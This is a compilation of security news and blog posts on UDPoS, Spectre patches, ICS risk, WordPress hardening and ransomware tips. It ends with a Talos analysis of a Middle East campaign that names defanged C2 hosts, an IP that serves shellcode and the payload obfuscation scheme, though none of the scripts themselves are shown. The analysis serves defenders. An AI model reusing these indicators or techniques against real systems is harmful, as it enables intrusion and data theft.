To learn more about the Satori botnet, and others like it, be sure to follow @McAfee and @McAfee_Labs on Twitter.

The post Satori Botnet Turns IoT Devices Into Zombies By Borrowing Code from Mirai appeared first on McAfee Blogs.

UDPOS PoS malware exfiltrates credit card data DNS queries

A new PoS malware dubbed UDPoS appeared in the threat landscape and implements a novel and hard to detect technique to steal credit card data from infected systems.

The UDPoS malware was spotted by researchers from ForcePoint Labs, it relies upon User Datagram Protocol (UDP) DNS traffic for data exfiltration instead of HTTP that is the protocol used by most POS malware.

The UDPoS malware is the first PoS malicious code that implements this technique disguises itself as an update from LogMeIn, which is a legitimate remote desktop control application.

“According to our investigation, the malware is intended to deceive an unsuspecting user into executing a malicious email, link or file, possibly containing the LogMeIn name,” reads a blogpost published by LogMeIn noted.

“This link, file or executable isn’t provided by LogMeIn and updates for LogMeIn products, including patches, updates, etc., will always be delivered securely in-product. You’ll never be contacted by us with a request to update your software that also includes either an attachment or a link to a new version or update.”

The UDPoS malware only targets older POS systems that use LogMeIn.

“However, in amongst the digital haystack there exists the occasional needle: we recently came across a sample apparently disguised as a LogMeIn service pack which generated notable amounts of ‘unusual’ DNS requests. Deeper investigation revealed something of a flawed gem, ultimately designed to steal magnetic stripe payment card data: a hallmark of PoS malware.” reads the analysis published by ForcePoint.

The command and control (C&C) server are hosted by a Swiss-based VPS provider, another unusual choice for such kind of malware.

The server hosts a 7-Zip self-extracting archive, update.exe, containing LogmeinServicePack_5.115.22.001.exe and log that is the actual malware.

UDPoS

The malicious code implements a number of evasion techniques, it searches for antivirus software disables them, it also checks if it is running in a virtualized environment.

“For the anti-AV and anti-VM solution, there are four DLL and three Named Pipe identifiers stored in both service and monitor components:

However, only the monitor component makes use of these and, moreover, the code responsible for opening module handles is flawed: it will only try to open cmdvrt32.dll – a library related to Comodo security products – and nothing else.” continues the analysis.

“It is unclear at present whether this is a reflection of the malware still being in a relatively early stage of development/testing or a straightforward error on the part of the developers.”

It must be highlighted that currently there is no evidence of the UDPoS malware currently being used in attacks in the wild, but the activity of the C&C servers suggests crooks were preparing the attacks.

In the past other malware adopted the DNS traffic to exfiltrate data, one of them is the DNSMessenger RAT spotted by Talos experts in 2017. The researchers from Cisco Talos team spotted the malware that leverages PowerShell scripts to fetch commands from DNS TXT records.

Further info about the UDPoS malware, including IoCs, are available in the blog post.

 

Pierluigi Paganini

(Security Affairs – UDPoS , PoS malware)

The post UDPOS PoS malware exfiltrates credit card data DNS queries appeared first on Security Affairs.

How to Avoid Ransomware in 5 Easy Steps

As you scroll through your social media feed, a window pops up: “Your hard drive has been encrypted. You have 48 hours to pay $200 or your data will be destroyed.” You see a link and instructions to “pay in Bitcoin.” An ominous looking timer counts down the seconds and minutes for the two-day window. Nine, eight, seven….  

Your thoughts immediately go to the contents of your hard drive — your daughter’s graduation video, your bank statements, a life insurance policy, pictures of your grandchildren — they all sit there, vulnerable, helpless bits of ones and zeros…and you don’t know what the heck bitcoin is.

Welcome to the world of ransomware — digital data hostage-taking only Hollywood could make up. Ransomware is a security threat for people and business, and cybersecurity experts predict it will only get worse in the future. One cause for its popularity is the profitability of the enterprise. Cyberthieves rake in millions every year with threats to destroy or encrypt valuable data if their ransoms aren’t paid.

You don’t need to be a millionaire or multinational corporation to be at risk. Cyberthieves also target the data of average consumers. When they target consumers, hackers may only request a few hundred dollars ransom but when the threat includes a thousand people, it makes for quite the lucrative venture. Many ransomware victims feel the risk of losing their data is too great, so they pay up. However, this only encourages the criminals.

The best way to combat ransomware is by not becoming a victim in the first place. To that end, here are five immediate steps you can take to avoid ransomware attacks.   

Step 1: Set Your Operating System to Automatically Update

The first step to avoiding ransomware is to update your operating system (OS). Anything connected to the web works better when it’s OS is updated. Tech companies like Microsoft and Apple regularly research and release fixes for “bugs” and security patches for vulnerabilities in their systems. It’s a cybersecurity game of cat and mouse. Cyberthieves search for “holes,” and companies race to find them first and “patch” them.

Users are key players in the game because they are the ultimate gatekeepers of their operating systems. If your OS isn’t up to date, you can’t take advantage of the security updates. Plus, your computer runs better with an updated OS.

Set your OS to update automatically and you won’t need to remember to do it manually. While Windows 10 automatically updates (you have no choice), older versions don’t. But setting auto updates are easy, whether you’re on a Mac or PC.  

Step 2: Screenshot Your Bank Emails

Cybercriminals use trojans or worms to infect your computer with ransomware. So avoiding these will help you avoid ransomware. Worms and trojan malware are often spread through phishing email scams, which trick users into opening email attachments containing viruses or clicking links to fake websites posed as legitimate ones.

One of the best tips for keeping phishing emails at bay is learning to identify them. Hackers send phishing emails that look like they come from banks, credit card companies, or the IRS. Phishing emails kickstart your fears and anxieties by suggesting there are “problems with your account” or insisting that “Urgent action is required.” Who wouldn’t be scared if their bank sent them an email saying, “You are overdrawn in your account.”

Cybercriminals use this fear to distract people so they will overlook the telltale signs of the phishing email like misspellings or common fear-inducing subject lines.     

Take screenshots of all of the legitimate emails from your bank, credit card companies, and others business that manage your sensitive information. Use these screenshots to compare with future emails you receive so you can spot phishing phonies and avoid ransomware.

Step 3: Bookmark Your Most Visited Websites

The next step in your ransomware avoidance journey is to bookmark all of your most visited websites. Just as with phishing emails, cybercriminals build websites that look like bank or credit card sites. Then they trick users into clicking a link and visiting them. From there, hackers steal your sign-in credentials or infect your computer with malware.

Think twice before you visit a website by clicking a link in an email, comments section, or private messaging app. Instead, bookmark your most visited or high-value websites and visit them through your browser.  

Step 4: Backup Your Data to the Cloud and a Hard Drive

This step is a no-brainer. Ransomware works if you only have one copy of your data. If it’s irretrievable, then cyberthieves have the upperhand, but if you have multiple copies, you have taken away the power behind the threat.

Back up your data to both a cloud service and a hard drive. That way, you have a copy that’s available anywhere there’s internet access and one that’s physically accessible all the time. Both types of storage are relatively inexpensive and will certainly prove worth it if you’re ever a ransomware target.

After backing up your data, set up a schedule so you can keep your data current. If you haven’t backed up your data in six months, you’re probably just as vulnerable to ransomware attacks as having no backup at all.

The post How to Avoid Ransomware in 5 Easy Steps appeared first on Panda Security Mediacenter.

The cyber threat hunting game has changed

Threat hunting has evolved into a modern day sport, as cybersecurity companies scour the Dark Web to be the first to define a new vulnerability, type of malware or attack

The post The cyber threat hunting game has changed appeared first on The Cyber Security Place.

NBlog February 9 – mapping awareness memes

Yesterday I came up with the suggestion of using memes to spread security awareness messages from person to person, in a similar fashion to the way that computer viruses and worms spread from IT system to IT system. 

Today I'm trying to come up with something that people will spread among each other by word of mouth, through email and TXT etc., something funny, shocking or useful - such as tips to avoid falling prey to malware maybe, or rumors about a serious malware infection within or close to the organization.

'Too close for comfort' has potential, perhaps a malware incident and business crisis narrowly averted by sheer good fortune. Or maybe we could fool workers into believing that the auditors will soon be coming to check up on the antivirus controls?

Such an approach could be unethical, risky even (e.g. if it prompted workers to meddle inappropriately with antivirus configurations or audit trails, rather than ensuring that the antivirus controls were operating correctly). It would need to be carefully considered and planned, which itself constitutes an awareness activity even if, in the end, the decision is taken not to go ahead.

The 'meme map' (derived from "Meme Maps: A Tool for Configuring Memes in Time and Space" by John Paull) represents the lifecycle and spatial or geographical spread of the meme. Reading from the bottom up, both the yellow area prior to the meme's release, and then the green area, are awareness opportunities.  

Mapping and demonstrating the gradual spread of a security awareness meme within the organization (e.g. mapping the source of clicks on a link to a fake internal memo about the fictitious antivirus audit, or tracking calls about the audit to the Help Desk) is yet another possible awareness activity, with similarities to the spread of malware ... at which point I recurse up my own backside, so that's enough idle musing for today's blog.

Water Utility Infected by Cryptocurrency Mining Software

A water utility in Europe has been infected by cryptocurrency mining software. This is a relatively new attack: hackers compromise computers and force them to mine cryptocurrency for them. This is the first time I've seen it infect SCADA systems, though.

It seems that this mining software is benign, and doesn't affect the performance of the hacked computer. (A smart virus doesn't kill its host.) But that's not going to always be the case.

When crypto-mining malware hits a SCADA network

Stealthy crypto-mining is on track to surpass ransomware as cybercriminals’ most favorite money-making option, and companies with computers and servers that run all day and night long are the preferred targets. This could be more than just a nuisance to the companies – it could seriously affect business operations and render some companies unable to operate for days and even weeks. In some instances, namely when the companies are part of critical infrastructure, the consequences … More

Hackers Can Now Steal Data Even From Faraday Cage Air-Gapped Computers

A team of security researchers—which majorly focuses on finding clever ways to get into air-gapped computers by exploiting little-noticed emissions of a computer's components like light, sound and heat—have published another research showcasing that they can steal data not only from an air gap computer but also from a computer inside a Faraday cage. Air-gapped computers are those that are

Industrial Control Systems Storm the Internet, Increase Corporate Risk

Industrial control systems (ICS) manage critical infrastructure, networks and monitoring equipment. These components form such an integral part of corporate backbones that companies are often reticent to apply fixes for fear of sudden performance loss.

But firms putting off patches may be missing the forest for the trees. According to SecurityWeek, the number of internet-accessible ICS components is up 10 percent from the previous year, even as the number of critical vulnerabilities has almost doubled.

The Shifting Foundation of Industrial Control Systems

Traditionally, ICS were separated from internet-facing devices. In some cases, this took the form of logical separation. For more critical industries, such as power generation and infrastructure control, air-gapped machines offered the best protection.

But the rise of always-connected devices has shifted the ICS foundation. Now, companies need a way to remotely monitor supervisory control and data acquisition (SCADA) and network systems and respond to real-time threats. That may explain why a Positive Technologies report recently discovered 175,632 internet-accessible ICS components, 42 percent of which were located in the U.S.

The study also found that vulnerabilities are on the rise. Major enterprises reported 197 in 2017, compared to just 115 the year before — and these aren’t minor weaknesses. Based on Common Vulnerability Scoring System (CVSS) v3 scoring, 41 percent are classified as “high vulnerability” and 20 percent are “critical.”

Vladimir Nazarov, head of ICS security at Positive Technologies, noted that “overall, industrial systems aren’t more secure than they were 10 years ago.” Instead, they’re simply more accessible.

ICS-Specific Threats on the Rise

It’s one thing to talk about generalized ICS risk, but it’s another to break down the specifics. According to TechTarget, a recent ICS malware strain known as Trisis targeted Triconex safety instrumented system (SIS) controllers made by a major manufacturer. The attack was discovered the attack in December 2017, but a week later, the targeted company posted critical parts of the malware to VirusTotal, including the code’s main executable, even though no fix was available.

The results weren’t surprising: Files were quickly copied and posted to public code repositories. As noted by Infosecurity Magazine, 14 key vulnerabilities in the Hardware Against Software Piracy (HASP) license management system put ICS systems at risk of distributed denial-of-service (DDoS) and remote access channel attacks. By simply scanning for port 1947 — which requires a USB token to access but remains open after the token has been removed — cybercriminals can compromise industrial control systems that otherwise appear secure.

Accessibility is now the hallmark of advanced technology. Devices removed from the internet at large are quickly becoming obsolete. Industrial control systems present a paradox: Companies recognize the need to keep these systems operational at any cost, but can’t ignore the demand for real-time monitoring and response. As a result, both accessible devices and critical vulnerabilities are on the rise, driving the development of ICS-specific malware.

The cat’s out of the bag: Companies need to design better ICS security or brace for systemwide compromise.

The post Industrial Control Systems Storm the Internet, Increase Corporate Risk appeared first on Security Intelligence.

Business Wire Suffers Week-Long DDoS Attack

Press release network Business Wire has admitted suffering an ongoing Distributed Denial of Service (DDoS) attack lasting a week so far, in a sign of the continued pressure high-profile firms

The post Business Wire Suffers Week-Long DDoS Attack appeared first on The Cyber Security Place.

Intel releases new Spectre security updates, currently only for Skylake chips

Intel is releasing new firmware updates that should address Spectre vulnerabilities CVE-2017-5715 for Skylake processors.

Intel is releasing new firmware updates limited to Skylake processors to address Spectre vulnerabilities, patches for other platforms are expected very soon.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

The company provided beta releases for the updates to apply to other processors to customers and partners to conduct extensive tests before the final release.

We all know the disconcerting story about the security patches released by Intel, on January 3, white hackers from Google Project Zero have disclosed some vulnerabilities in Intel chips called Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), Intel promptly released security patches but in many cases they caused problems to systems.

Many companies rolled out patches to revert the Intel updates, including Red Hat and Microsoft.

Now Intel seems to have a more clear idea about the cause of the problems observed after the deploy of the initial updates and release new microcode updates.

“For those concerned about system stability while we finalize the updated solutions, we are also working with our OEM partners on the option to utilize a previous version of microcode that does not display these issues, but removes the Variant 2 (Spectre) mitigations. This would be delivered via a BIOS update, and would not impact mitigations for Variant 1 (Spectre) and Variant 3 (Meltdown). ” states the microcode revision guidance issued by Intel.

Problems such as frequent reboots were related to the fix for the CVE-2017-5715 Spectre flaw (Spectre Variant 2) and affected almost any platform, including systems running on Broadwell Haswell CPUs, as well as Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

While many users have chosen to don’t install the patches to avoid problems, security firms are reporting the first PoC malware that exploits the Meltdown and Spectre vulnerabilities.

On January 17, experts at AV-TEST reported that they had detected 77 malware samples apparently related to the Intel vulnerabilities.

 

Pierluigi Paganini

(Security Affairs – Intel, CVE-2017-5715)

The post Intel releases new Spectre security updates, currently only for Skylake chips appeared first on Security Affairs.

Microsoft & Google unable to detect new zero-day ransomware

The ShurL0ckr ransomware was able to avoid detection by a majority of anti-virus engines and cloud applications.As organisations have adopted cloud services to increase their productivity and agility, so to

The post Microsoft & Google unable to detect new zero-day ransomware appeared first on The Cyber Security Place.

IoTroop botnet: How to protect yourself from the cyber-storm of the century

The IoTroop botnet, which shares an extensive code base with the leaked Mirai source code, stands to cause even more damage than its predecessor.Almost one year ago exactly, computers across

The post IoTroop botnet: How to protect yourself from the cyber-storm of the century appeared first on The Cyber Security Place.

NBlog February 8 – making security awareness infectious

Just appearing into view along our virtual conveyor belt comes an updated module on malware, one of those perennial, almost universally-applicable security awareness topics.

Aside from generally checking over and fluffing-up the content delivered in prior years, we're on the lookout for new developments, specifically any changes in the risk profile or security controls associated with malware.

Something we've spotted is an alleged move away from ransomware (which was Big News this time last year, a real and present danger) towards using compromised systems for crypto currency mining. I'm not entirely convinced at this point whether that is a genuine change: maybe ransomware has indeed peaked out (I sure hope so!), maybe not, but either way mining malware could be an emerging trend, another short-lived fad, a mistaken interpretation of limited data or pure fiction invented by someone flogging antivirus software.

Over a much longer timescale, commercial exploitation of malware remains evident, along with the continuing battles between black and white hats. For decades we have seen innovative and increasingly complex technologies being deployed on both sides - clever stuff, but things have more or less stalled on the human front. Despite our best efforts through awareness, education, training, phishing simulators etc., the same old social engineering tricks remain somewhat effective today at spreading malware, and there's plenty of potential there for further innovation. 

Novelty is a challenge for both the tech and non-tech malware defenses. This is cutting-edge stuff where established approaches gradually lose their power. Purely responding to changes on the offensive side is bound to set us on the back foot, especially given that most of those changes are unrecognized as such, initially anyway. Who knows, maybe the Next Big Thing in social engineering might be quietly ramping up right now.

So, I'm sitting here thinking about how to encourage NoticeBored subscribers to up their game with more innovative malware defenses, including our creative efforts on security awareness of course but what else could they be doing? Hmmm, I wonder if security awareness messages could be delivered by malware-like infectious mechanisms? 

Probably not a good idea, that one, subject to the same risks and drawbacks as those supposedly benevolent worms designed to patch systems against security vulnerabilities. 

A meme, though, has possibilities. If we can't infect IT systems with technological controls, can we at least infect people with behavioral controls, in a way that spreads from person-to-person like a beneficial form of flu, without the sniffles?

Meltdown and Spectre Aren’t Done Just Yet – New Malware Uses Exploits to Potentially Attack Browsers

We kicked off 2018 with two powerful new exploits: Meltdown and Spectre. And since the discovery of Meltdown and Spectre on January 3rd, vendors have been hard at work issuing patches to remedy their nasty side effects – with the majority supplying fixes within the first week. But, unfortunately, some malware makers have still found ways to leverage a handful of these exploits. In fact, according to the AV-Test Institute, there are currently 139 malware samples out in the wild that appear to be related to the recently reported CPU exploits and have been designed to attack web browsers running JavaScript.

So, why is this still happening? Though operating system vendors, chip makers, and browser makers have released patches to mitigate the attacks, that doesn’t exactly mean all systems everywhere have been locked down, especially as new malware strains continue to emerge. In fact, the CVE-2017-5715, CVE-2017-5753, and CVE-2017-5754 exploits are still being abused by cybercriminals, who are leveraging them to potentially attack browsers that support JavaScript and WebAssembly.

What’s more – if they successfully infiltrate these browsers, cybercriminals can steal passwords and other personal data. So, it’s crucial users are vigilant and take the necessary precautions to secure their personal info while surfing the web. To do just that, follow these tips:

  • Exit out of your browser window. If you’re not actively using your browser window, close it. This should decrease your chances for attack and also conserve energy in the process.
  • Update everything regularly. Along with updating every type of device impacted by Meltdown and Spectre, be sure to update your browser as soon as an update becomes available. That way, you can apply any additional patches that are created to combat these new malware attacks.
  • Surf the web safely. As I noted in my last post about Meltdown and Spectre, McAfee products are not affected by this exploit. Therefore, after you’ve updated your devices with the latest security software, it’s time to take the next step in personal security by locking down your browser as well. You can do that by installing McAfee WebAdvisor, which acts your own personal safety advisor for your online activity.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Meltdown and Spectre Aren’t Done Just Yet – New Malware Uses Exploits to Potentially Attack Browsers appeared first on McAfee Blogs.

Android devices roped into new Monero-mining botnet

A new Monero-mining bot sprang up a few days ago and, in just a few days, has created a botnet consisting of over 7,000 Android devices, most of which are located in China (39%) and Korea (39%). Spreading capabilities The rise of the botnet has been flagged by researchers with Qihoo 360’s Netlab, who analyzed the mining malware and discovered that it has worm-like spreading capabilities. Once ADB.miner – as they’ve dubbed the threat – … More

Cyber Espionage Group Targets Asian Countries With Bitcoin Mining Malware

Security researchers have discovered a custom-built piece of malware that's wreaking havoc in Asia for past several months and is capable of performing nasty tasks, like password stealing, bitcoin mining, and providing hackers complete remote access to compromised systems. Dubbed Operation PZChao, the attack campaign discovered by the security researchers at Bitdefender have been targeting

9 Tips to Prevent WordPress Hacks in this Dangerous Digital World

WordPress hacks are increasingly common. Whether it’s for malicious reasons, to harm a site or to just insert backlinks, WordPress can be very vulnerable if not cared for and updated regularly. How to Prevent hacks?

So, how do you prevent these security blips – this post aims to show how.

  1. Backup

Regular data backup can save you lots of frustration and headache, and especially after a hack. Taking the necessary measures to ensure information on your WordPress site or blog is backed up before making any significant changes, and doing the same after updates are recommended.

Although most people prefer to backup their data manually, using a plugin can make your work much more manageable. Plugins provide a convenient way to handle data backups at set times or intervals. Backup buddy (a plugin) is pretty good at this.

Although a paid option, this plugin exports everything on your WP from settings, files, images, and content on the database. You could also opt for free plugins as well.

  1. Update the WordPress Version as Quickly as the New Comes

Updating your blog/site to the latest WP version can also save you lots of trouble. The regular updates are not only meant to make your experience much better but also patches security loopholes that could otherwise be manipulated by hackers.

You can simply follow WordPress feeds to find out about new updates, or just log in to the blog as admin. Be sure to follow WordPress Development blogs to get the latest updates on when the next patch or fixed will be released.

  1. Check Themes and Plugins for Continued Support

Only used plugins and themes with continuous support and updates.  It is through the continued support that developers of the same can release patches to make their plugins hacker-proof.

Any outdated or plugins/themes that no longer receive updates should be avoided, or uninstalled altogether. Most developers only provide support for about a year or two, then discontinue support for the same.

Be sure to look for themes or plugins with active support, receives frequent updates, well-rated, and customer support. You will be surprised to know most of the top-selling themes are outdated or longer receive updates.  Look at the comment section for red flags and other indicators of flaws in the same before making an order.

Most of the premium WordPress themes will come bundled with third-party plugins.  Some of the plugins bundled with the theme may or may not receive frequent updates.

Revolution Slider is an excellent example of plugins that come bundled with lots of themes on ThemeForest. This plugin had a major vulnerability back in 2014.

The thousands of sites that used this plugin were hacked with most of the hacks redirecting traffic to malicious sites. Although the developers of the same were pushing out updates for their themes, one loophole cost many websites a fortune.

As a precaution, consider investing in plugins that aren’t bundled with extra ‘freebies’. If need be, buy each plugin individually to reduce vulnerabilities to your site. You also need to turn on updates on these plugins to keep your site safe as well.

  1. Keep the WP Admin Directory Protected

The admin directory in WP should always be password protected at all times. It holds the key to every function and security of the site.  Password protecting the WP-admin directory helps keep hackers and other malicious people at bay.

This also means the admin will be required to enter two passwords to access the admin directory. The first password gives access to the login page with the WP-Admin directory still protected. The fun part about password-protecting this directory is that you get to control all aspects of the site, including unlocking various parts for access to authorized users only.

One way to protect the WP-admin directory is by installing the AskApache Password Protect plugin. The plugin configures enhanced security file permissions and encrypts the directory with a .htpasswd file.

  1. Encrypt Data with Secure Socket Layer (SSL) Certificate

Using the SSL certificate to secure the Admin panel is not only wise but a smart move.  This certification ensures data transfer between the server and user browsers is encrypted and almost impossible to breach.

This enhances data security on the site. Getting an SSL certificate is easy too. You can have your hosting firm for one, or just buy the certificate from a dedicated company.

The Let’s Encrypt SSL certificate is available for free and is an open source product as well. This means it does a pretty good job of keeping your site and data secure. Using an SSL certificate on your WP site can also help boost the site’s rankings on Google

  1. Rename the Login URL

Changing the default WP login address to a different one gives your site an extra layer of security. You can do this by accessing the site’s admin URL.

Renaming the URL makes it hard for hackers to brute force their way into the site. Test the new login details with GWDb to see if anyone can guess your login details.

Although a simple maneuver, this trick helps restrict unauthorized entry to your login page. Only individuals with the login URL and details can access the dashboard. You could also use the iThemes Security plugin to rename your login address.

  1. Never use Public Wi-Fi to Log In

Although public Wi-Fi may seem convenient, it poses multiple threats to your devices, sites, and online activity.  Any malicious person on the same network or running packet sniffing software can sniff out any personal data you send via the same.  If you have to log in to your WP site admin panel, then ensure you have an SSL certificate installed, or better still, use a virtual private network (VPN).

Have a VPN service installed on your computer or any other device just in case you need to log in to your site.  It would also be a good habit to have the VPN running even with the SSL certificate installed. Never underestimate the skills of a black hat hacker targeting your site.

  1. Disable File Editing

Users with admin access to your WP site or dashboard can edit or even change files on the site. This includes themes and plugins already installed in the same.

Disabling file editing on the site means only you can make changes to the site, and also helps make it almost impossible for hackers to change anything on the site. Any hacker that gains access to the WP dashboard will find it hard to change or modify files already on the site. Consider disallowing other users adding content and scripts to the site as well.

To do this, add these commands to the wp-config.php file located at the very end.

Define (‘DISALLOW_FILE_EDIT’, true);

  1. Use the Right Server Configurations and Connections

According to matthewwoodward.co.uk you should only connect the server through SSH or SFTP when setting up the site for the first time. SFTP has more security features enabled as compared to the traditional FTP protocol. These security features are also not attributed to FTP, thus enhanced security.

Connecting the server via SFTP and SSH guarantees secure file transfer. Most web hosting providers can provide this service on request, with some offering it as a part of their packages. You can also enable these features manually too. Some expert knowledge may be needed to connect such safety and without much struggle.

Written by Ali Qamar, Founder/Chief Editor at Cyberogism.com

Ali QamarAuthor Bio:
Ali Qamar is a tech and security enthusiast who enjoys “deep” research to dig out modern discoveries in the security industry. Currently, he is the chief editor at Cyberogism.com, an ultimate source for tech, security and innovation. To be frank and honest, Ali started working online as a freelancer and still shares the knowledge for a living. He is passionate about sharing the knowledge with people, and always try to give only the best. Follow Ali on Twitter @AliQammar57

Pierluigi Paganini

(Security Affairs –  hacking,  WordPress)

The post 9 Tips to Prevent WordPress Hacks in this Dangerous Digital World appeared first on Security Affairs.

What can businesses learn from the cyber threat landscape of 2017?

Over the course of 2017, global cyber threats continued to evolve at pace, resulting in a dramatic reshaping of the cyber security landscape. Traditional threats such as generic Trojans, ransomware

The post What can businesses learn from the cyber threat landscape of 2017? appeared first on The Cyber Security Place.

Enterprises spend more than $16 million on hidden costs of detection

Most organizations employ some kind of detection-based security to protect their systems. But a new report by cyber security company Bromium reveals that this approach has major hidden costs.Upfront licensing

The post Enterprises spend more than $16 million on hidden costs of detection appeared first on The Cyber Security Place.

2017: Worst Year Ever for Data Loss and Breaches

Last year set the record for both the most breaches and the most data compromised in a year, as several new trends (like a surge in cloud storage misconfigurations) characterized

The post 2017: Worst Year Ever for Data Loss and Breaches appeared first on The Cyber Security Place.

Targeted Attacks In The Middle East

This blog post is authored by Paul Rascagneres with assistance of Martin Lee.

Executive Summary


Talos has identified a targeted attacks affecting the Middle East. This campaign contains the following elements, which are described in detail in this article.

  • The use of allegedly confidential decoy documents purported to be written by the Jordanian publishing and research house, Dar El-Jaleel. This institute is known for their research of the Palestinian-Israeli conflict and the Sunni-Shia conflict within Iran.
  • The attacker extensively used scripting languages (VBScript, PowerShell, VBA) as part of their attack. These scripts are used to dynamically load and execute VBScript functions retrieved from a Command & Control server.
  • The attacker demonstrates excellent operational security (OPSEC). The attacker was particularly careful to camouflage their infrastructure. During our investigation, the attacker deployed several reconnaissance scripts in order to check the validity of victim machine, blocking systems that don't meet their criteria. The attacker uses the reputable CloudFlare system to hide the nature and location of their infrastructure. Additionally, the attacker filters connections based on their User-Agent strings, and only enables their infrastructure for short periods of time before blocking all connections.

This is not the first targeted campaign against the region that uses Dar El-Jaleel decoy documents which we have investigated. However, we have no indication that the previous campaigns are related.


VBS Campaign


Stage 1: VBScript


The campaign starts with a VBScript named من داخل حرب ايران السرية في سوريا.vbs ("From inside Iran's secret war in Syria.vbs"). Here are the script contents:

The purpose of this script is to create the second stage PowerShell script described in the next section.

Stage 2: PowerShell Script


The goal of the generated PowerShell script is to create a Microsoft Office document named Report.doc and to open it.

Stage 3: Office Document With Macros


Here is a screenshot of the Office document:
This document purports to be written by Dar El-Jaleel. Dar El-Jaleel is a publishing and studies house based in Amman, Jordan. This institute is well-known for their research concerning the Palestinian-Israeli conflict and the Sunni-Shia conflict in Iran. Tagged as confidential, the document is an analysis report on Iranian activities within the Syrian civil war.

This document contains a Macro:

The purpose of this Macro in to create a WSF (Windows Script File) file and to execute it.

Stage 4: WSF Script


The created WSF script is the main part of the infection:
The top of the script contains configuration information:

  • the hostname of the Command & Control - office-update[.]services,
  • the port - 2095,
  • the User-Agent - iq.46-|-377312201708161011591678891211899134718141815539111937189811

The User-Agent is used to identify the targets. The CC filters network connections based on this string, only allowing through connections made with authorised User-Agent strings.

The first task of the script is to register the infected system by performing an HTTP request to http://office-update[.]services:2095/store. Next, the script executes an infinite loop, attempting to contact the /search URI every 5 seconds in order to download and execute additional payloads.

Additional Payloads


The WSF script receives payloads of three types, named s0, s1, s2. The payloads are VBScript functions loaded and executed on the fly with the ExecuteGlobal() and GetRef() APIs. The only differences between s0,s1 and s2 type payloads are the number of arguments supplied to the executing function. s0 does not require any arguments, s1 accepts one argument, and s2 two arguments.

The downloaded payload functions are obfuscated, here is an example of the raw data:

The first element is the function type (s0), followed by a separator '-|-'. The second element is the obfuscated function; this consists of ASCII values, separated by '*'. For example the above data decodes as:
  • 45: -
  • 54: 6
  • 53: 5
  • 43: +
  • 49: 1
  • 52: 4
  • 56: 8
  • 42: *
  • 53: 5
  • 51: 3
  • 53: 5
  • 45: -
  • 52: 4
  • 49: 1
  • 56: 8
  • 42: *
Hence, the decoded data is "-65+148*535-418*". Then follows a second step, again using '*' as a separator. Each mathematical operation is resolved to obtain a new ASCII value:
  • -65+148 = 83 -> "S"
  • 535-419 = 117 -> "u"
This technique is used to construct a new VBScript function.
During our investigation we received 5 different functions.

Reconnaissance Functions


During our investigation we received a reconnaissance function a few minutes after the initial compromise. The purpose of the function was to retrieve several pieces of information from the infected system, presumably in order to check if the target is valuable or not (or a sandbox system).

First, the attacker retrieves the disk volume serial number:

Secondly, the payload retrieves any installed anti-virus software:

Thirdly, it obtains the Internet IP address of the infected system by querying ipify.org (the code includes a hint that the attacker previously used wtfismyip.com):


Thirdly, it retrieves the computer name, the username, the Operating System and the architecture:

All these data are sent to the previously mentioned CC using the /is-return URI. The data are stored in the User-Agent separated by "-|-".

Subsequently, we received a second reconnaissance function:

The function acts to list the drives of the infected system and their type (internal drive, usb driver etc.)

Persistence Functions


In addition to the reconnaissance functions we received 2 functions linked to the persistence of the WSF script. The first script is used to persist, the second is used to clean the infected system. Our machine was served this after taking too much time to send a request to the C2 Presumably the attacker determined we were examining their systems and decided to remove the malware to prevent further analysis:

Pivot Function


Finally, we received a pivot function. The function is the only non-s0 function we obtained during our research. This is a s1 function that takes one argument:

Here is the argument:

The purpose is to execute a powershell script:
The PowerShell script executes a second base64 encoded script. The attacker forces the the system to use the 32 bit version of Powershell even if the operating system architecture is 64 bits.

Finally we obtain the last PowerShell script:

The purpose of this script is to download shellcode from 176[.]107[.]185[.]246 IP, to map it in memory and to execute it. The attacker takes many precautions before delivering the shellcode, these will be explained in the next chapter. Unfortunately during our investigation we weren't served the anticipated shellcode.

Attackers OPSEC


The attacker behind this campaign put a lot of effort into protecting its infrastructure and to avoid leaking code to analysts. The first Command & Control server is protected by CloudFlare. This choice complicates the analysis and tracking of the campaign. Additionally, the attacker filters on the User-Agent; if your web requests do not fit a specific pattern, your request will be ignored. During our analysis the attacker was only active during the morning (Central European Timezone), similarly the various different payloads were only sent during mornings (Central European Time). When an infected system receives the pivot function, the attacker disables their firewall for a few minutes to allow this unique IP to download the shellcode. Afterwards, the server becomes unreachable. Here is a schema of this workflow:

Additionally, we saw that the attackers blacklisted some of our specific User-Agent strings and IP addresses used during our investigation

This high level of OPSEC is exceptional even among presumed state sponsored threat actors...

Links with Jenxcus (a.k.a. Houdini/H-Worm)?


If you are familiar with Jenxcus (a.k.a. Houdini/H-Worm) you should see some similarities between the VBScript used during this campaign and this well-known malware: usage of the user-agent to exfiltrate data, reconnaissance techniques etc…

We cannot tell if the attacker used a new version of Jenxcus or if this malware served as the inspiration for their own malicious code. The source code of Jenxcus can be easily found on the Internet. However, the adaptation used in this campaign is more advanced: the features/functions are loaded on demand and the initial script does not include all the malicious code unlike Jenxcus.

Additional Targets


We can identify different targets based on the User-Agent used by the attacker to identify victims. These are a few examples:
c = "U.15.7"
a = "738142201756240710471556115716122461214187935862381799187598"


c = "1X.134"
a = "130427201706151111209123451288122413771234715862388136654339"


c = "Fb-20.9"
a = "585010201750201110021112344661899112271619123139116684543113"

Other Campaigns Using Dar El-Jaleel Decoy Documents


This is not the first time Talos has investigated targeted campaigns using Dar El-Jaleel decoy documents. During 2017, we identified several campaigns using the same decoy documents:

This document is a weekly report about the major events occuring during the 1st week of November 2017, talking about the most important events happening in Jordan, Iraq, Syria, Lebanon, Palestine, Israel, Russia, ISIS and the ongoing Gulf Countries conflict with Qatar.

We encountered this document in campaigns using .NET malware (with the CC: foxlive[.]life) and C++ malware (with the CC: download[.]share2file[.]pro). The purpose of the malwares was to retrieve information relating to the targeted systems and to download an additional payload. Moreover, we identified another campaign using a share2file[.]pro subdomain. Here is the decoy document in this campaign:

This document is a pension list of military personnel dated June 2017, containing names of individuals which we have redacted, alongside a military rank.

We don't know if these campaigns are performed by the same actor or different groups interested in this region. These campaigns are still under investigation.

